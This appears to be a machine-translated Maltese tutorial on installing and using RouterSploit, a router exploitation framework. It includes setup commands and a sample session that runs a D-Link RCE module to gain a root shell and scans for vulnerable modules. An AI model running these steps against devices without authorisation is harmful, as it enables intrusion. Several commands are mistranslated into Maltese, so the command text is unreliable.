
RouterSploit huwa qafas ta 'sfruttament aqwa magħmul speċifikament għal apparati inkorporati.
Din l-għodda tista 'tintuża minn pentester biex tiskennja s-sigurtà tal-kameras u r-routers.
Punti ewlenin ta' RouterSploit:
- Kodifikat f'Python.
- Interface tal-linja tal-kmand.
- Appoġġ Docker.
- Għodod Modulari.
OS appoġġjat:
- MacOS.
- Linux.
- Telefon Android.
- Windows.
Installazzjoni ta' RouterSploit:
Rekwiżiti:
- futur
- talbiet
- Paramika
- waqqaf
- pycrypto
Fakultattiv:
- bluepy – enerġija baxxa Bluetooth
Installazzjoni f'Kali Linux:
Segwi l-kmandi hawn taħt:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Appoġġ Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.pyInstallazzjoni f'Ubuntu:
Segwi l-kmandi hawn taħt:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Appoġġ Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.pyInstallazzjoni fuq MacOS:
Segwi l-kmandi hawn taħt:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.pyInstallazzjoni fuq Docker:
Segwi l-kmandi hawn taħt:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploitKif Taġġorna RouterSploit?
Ikollok bżonn taġġorna RouterSploit spiss biex tevita l-inkonvenjent.
Moduli ġodda jintbagħtu kważi kuljum.
cd routersploit
git pullKif tuża RouterSploit?
Użu
għerq@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ _| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Qafas ta' Sfruttament għal |_| minn Theddida9 Apparati Inkorporati Isem tal-kodiċi : Kont naf li int Inkwiet Verżjoni : 3.3.0 Homepage : https://www.threat9.com/ - @threatnine Ingħaqad ma' Slack : routersploit.slack.com Ingħaqad mal-Programm Beta Threat9 - https://www.threat9.com/ Sfrutta: 128 Skaners: 4 Krediti: 165 Ġeneriċi: 4 Tagħbijiet: 32 Encoders: 6 rsf >
Sfrutta:
Biex jippreforma l-Isfruttament, agħżel biss il-modulu u ssettja l-mira:
rsf > uża jisfrutta/ tisfrutta/2wire/ tisfrutta/asmax/ tisfrutta/asus/ tisfrutta/cisco/ tisfrutta/dlink/ tisfrutta/fortinet/ tisfrutta/juniper/ tisfrutta/linksys/ tisfrutta/multi/ tisfrutta/netgear/ rsf > uża exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
Għat-tlestija uża tab-key.
Biex turi għażliet, tipshow:
rsf (D-LINK DIR-300 & DIR-600 RCE) > turi għażliet Għażliet fil-mira: Isem Issettjar kurrenti Deskrizzjoni ---- ---------------- ----------- mira Indirizz fil-mira eż. http://192.168.1.1 port 80 Port fil-mira
Użurun jewexploit kmand biex tisfrutta l-mira:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run [+] Il-mira hija vulnerabbli [*] Invokazzjoni tal-linja tal-kmand... ċmd > whoami għerq
Biex tissettja l-għażliet:
rsf (D-LINK DIR-300 & DIR-600 RCE) > issettja mira http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
Huwa possibbli li tivverifika jekk il-mira hijiex vulnerabbli għal sfruttament partikolari:
rsf (D-LINK DIR-300 & DIR-600 RCE) > iċċekkja [+] Il-mira hija vulnerabbli
Mexxishow info biex turi informazzjoni dwar l-isfruttament.
Skennjar għal Miri Vulnerabbli:
Skaners jippermettu malajr biex jivverifikaw jekk il-mira hija vulnerabbli għal xi jisfrutta.
Uża l-istess kmandi biex turi/settja l-għażliet, u wkoll biex imexxu.
rsf (D-Link Skaner) > run [+] exploits/dlink/dwr_932_info_disclosure hija vulnerabbli [-] exploits/dlink/dir_300_320_615_auth_bypass mhux vulnerabbli [-] exploits/dlink/dsl_2750b_info_disclosure mhix vulnerabbli [-] exploits/dlink/dns_320l_327l_rce mhix vulnerabbli [-] exploits/dlink/dir_645_password_disclosure mhix vulnerabbli [-] exploits/dlink/dir_300_600_615_info_disclosure mhix vulnerabbli [-] exploits/dlink/dir_300_600_rce mhix vulnerabbli [+] L-apparat huwa vulnerabbli! - jisfrutta/dlink/dwr_932_info_disclosure
Aqra wkoll: 1337x prokura
Kliem Finali:
RouterSploit hija għodda aqwa biex tużah.
Jekk tiffaċċja xi kwistjonijiet dwar il- RouterSploit. Kun żgur li tikkummenta hawn taħt. It-tim tagħna CSHAWK se jkun f'kuntatt miegħek malajr kemm jista' jkun.